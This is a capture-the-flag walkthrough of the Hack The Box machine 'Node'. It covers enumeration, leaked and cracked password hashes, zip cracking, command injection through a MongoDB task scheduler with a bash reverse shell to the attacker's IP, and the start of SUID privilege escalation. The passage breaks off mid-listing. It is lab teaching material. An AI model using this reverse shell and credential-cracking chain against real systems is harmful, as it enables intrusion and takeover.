This page looks best with JavaScript enabled

Hackthebox - Node

 ·  ☕ 14 min read  ·  👤 Hong
Hackthebox - Node

Enumeration

1

nmap -sC -sV 10.10.10.58 -oN node_scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1

nmap -A -p- -sC -sV 10.10.10.58 -oN node_scan_2
  • Cannot use dirbuster, gobuster or any other automated directory search tools. There is a filter that prevents the usage of these tools
1

gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
  • If we curl we can find info and response
1

curl -vvv 10.10.10.58:3000curl 

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110

*   Trying 10.10.10.58:3000...
* Connected to 10.10.10.58 (10.10.10.58) port 3000 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.58:3000
> User-Agent: curl/7.81.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Accept-Ranges: bytes
< Cache-Control: public, max-age=0
< Last-Modified: Sat, 02 Sep 2017 11:27:58 GMT
< ETag: W/"f15-15e4258ef70"
< Content-Type: text/html; charset=UTF-8
< Content-Length: 3861
< Date: Fri, 11 Mar 2022 04:14:30 GMT
< Connection: keep-alive
< 
<!doctype html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en" ng-csp="" ng-app="myplace"> <!--<![endif]-->

        <head>

                <base href="/">
                <meta charset="utf-8">
                <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

                <title>MyPlace</title>

                <!-- Bootstrap Core CSS -->
                <link href="/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

                <!-- Theme CSS -->
                <link href="/assets/css/freelancer.min.css" rel="stylesheet">
                <link href="/assets/css/app.css" rel="stylesheet">

                <!-- Custom Fonts -->
                <link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css">
        </head>

        <body id="page-top" class="index">

    <!-- Navigation -->
    <nav id="mainNav" class="navbar navbar-default navbar-fixed-top navbar-custom">
        <div class="container">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header page-scroll">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                    <span class="sr-only">Toggle navigation</span> Menu <i class="fa fa-bars"></i>
                </button>
                <a class="navbar-brand" href="/">MyPlace</a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li class="hidden">
                        <a href="/"></a>
                    </li>
                    <li class="page-scroll">
                        <a href="/login">Login</a>
                    </li>
                </ul>
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container-fluid -->
    </nav>

    <!-- Header -->
    <header>
        <div class="container">
            <div class="row">
                <div class="col-lg-12">
                    <img class="img-responsive" src="img/profile.png" alt="">
                    <div class="intro-text">
                        <span class="name">Welcome to MyPlace</span>
                    </div>
                </div>
            </div>
        </div>
    </header>

                <!--[if lt IE 8]>
                    <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
                <![endif]-->

                <div data-ng-view=""></div>

        </body>

        <script type="text/javascript" src="vendor/jquery/jquery.min.js"></script>
        <script type="text/javascript" src="vendor/bootstrap/js/bootstrap.min.js"></script>
        <script type="text/javascript" src="vendor/angular/angular.min.js"></script>
        <script type="text/javascript" src="vendor/angular/angular-route.min.js"></script>
        <script type="text/javascript" src="assets/js/app/app.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/home.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/login.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/admin.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>
        <script type="text/javascript" src="assets/js/misc/freelancer.min.js"></script>
</html>
* Connection #0 to host 10.10.10.58 left intact
  • We can specified the header
1

curl -H "User-Agent: Dirbuster" 10.10.10.58:3000

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

curl -H "User-Agent: Dirbuster" 10.10.10.58:3000                                                                   root@sake
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQDQf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ


<!-- 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 -->#

Exploitation

  • Inspecting the website we found couple interesting paths
    • assets/js/app/app.js
    • assets/js/app/controllers/home.js
    • assets/js/app/controllers/login.js
    • assets/js/app/controllers/admin.js
    • assets/js/app/controllers/profile.js
    • assets/js/misc/freelancer.min.js
  • Let’s check /api/admin/backup found in /admin.js
    • Nothing really interesting here
  • /api/users/
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

0	
_id	"59a7365b98aa325cc03ee51c"
username	"myP14ceAdm1nAcc0uNT"
password	"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"
is_admin	true
1	
_id	"59a7368398aa325cc03ee51d"
username	"tom"
password	"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"
is_admin	false
2	
_id	"59a7368e98aa325cc03ee51e"
username	"mark"
password	"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73"
is_admin	false
3	
_id	"59aa9781cced6f1d1490fce9"
username	"rastating"
password	"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0"
is_admin	false


1
2
3
4
5

dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af # manchester

de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 # snowflake

5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0 # Not found

Logged in with myP14ceAdm1nAcc0uNT | manchester

  • Download the backup file
  • Looks like a base64

1
2
3

file myplace.backup

	-> myplace.backup: ASCII text, with very long lines (65536), with no line terminators
  • Translate the base64 file
1

cat myplace.backup | base64 -d > myplace

1
2

file myplace
	-> myplace: Zip archive data, at least v1.0 to extract, compression method=store

1

unzip myplace # requires password

1
2
3
4
5
6

fcrackzip -uDp /usr/share/wordlists/rockyou.txt ./myplace
	[-u] use unzip to weed out wrong passowrds
	[-D] use a dictionary
	[-p] use string as initial password/file

PASSWORD FOUND!!!!: pw == magicword
  • Opening app.js we can find some credentials
  • mark | 5AYRft73VtFpc84k
1

ssh mark@10.10.10.58

  • The flag is in tom but we need privileges to get access to tom
1

ps aux # see the running processes

  • There is an interesting path /var/scheduler/app.js
1

nano /var/scheduler/app.js

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});
  • mongo db stores information as collections.
  • We can connect to the scheduler database and insert a new collection in tasks with the command we want and it will execute in (doc.cmd)
  • mark : 5AYRft73VtFpc84k
  • Conencting to the database scheduler. Ref → https://docs.mongodb.com/v4.4/mongo/
1
2
3
4

mongo --username mark --password 5AYRft73VtFpc84k scheduler

> show collections
tasks
  • SSH with another terminal and place a reverse shell in /tmp
 1
 2
 3
 4
 5
 6
 7
 8
 9
10

ssh mark@10.10.10.58

cd /tmp
nano shell.sh 

---
bash -i >& /dev/tcp/10.10.14.18/8080 0>&1
---

nc -lvnp 8080

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

db.tasks.find()

db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
	---
	{
		"acknowledged" : true,
		"insertedId" : ObjectId("622bbe2b5804df2507a28893")
	}
	---

db.tasks.find() # Check if the task is still there if not we already got a shell

Interactive Shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

which python

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
[enter]
export TERM=screen

cat /tom/user.txt
	-> e1156acc3574e04b06908ecf76be91b1

Privilege Escalation

  • Looking at the myplace /app.js this part will help to escalate privileges

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

find / -perm -u=s 2>/dev/null

	/usr/lib/eject/dmcrypt-get-device
	/usr/lib/snapd/snap-confine
	/usr/lib/dbus-1.0/dbus-daemon-launch-helper
	/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
	/usr/lib/openssh/ssh-keysign
	/usr/lib/policykit-1/polkit-agent-helper-1
	/usr/local/bin/backup
	/usr/bin/chfn
	/usr/bin/at
	/usr/bin/gpasswd
	/usr/bin/newgidmap
	/usr/bin/chsh
	/usr/bin/sudo
	/usr/bin/pkexec
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/newuidmap
	/bin/ping
	/bin/umount
	/bin/fusermount
	/bin/ping6
	/bin/ntfs-3g
	/bin/su
	/bin/mount

1

cd /usr/local/bin

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234

app.js
---
const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  app.use(session({
    secret: 'the boundless tendency initiates the law.',
    cookie: { maxAge: 3600000 },
    resave: false,
    saveUninitialized: false
  }));

  app.use(function (req, res, next) {
    var agent = req.headers['user-agent'];
    var blacklist = /(DirBuster)|(Postman)|(Mozilla\/4\.0.+Windows NT 5\.1)|(Go\-http\-client)/i;

    if (!blacklist.test(agent)) {
      next();
    }
    else {
      count = Math.floor((Math.random() * 10000) + 1);
      randomString = '';

      var charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
      for (var i = 0; i < count; i++)
        randomString += charset.charAt(Math.floor(Math.random() * charset.length));

      res.set('Content-Type', 'text/plain').status(200).send(
        [
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQP\'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ',
          'QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ',
          'QQQQQQQQQQW\' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ',
          'QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ',
          'QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ',
          'QQQQQQQP\'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ',
          'QQQQQP\'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP\'    "??\' =QQmWWV?46/ ?QQQQQ',
          'QQQP\'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ',
          'QQ[ j@mQP\'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ',
          'QW jQkQ@ jWQQD\'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ',
          'QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ',
          'QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ',
          'QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??\'<mWWWWWQW?^  ` ]6QQ\' yQQQQQ',
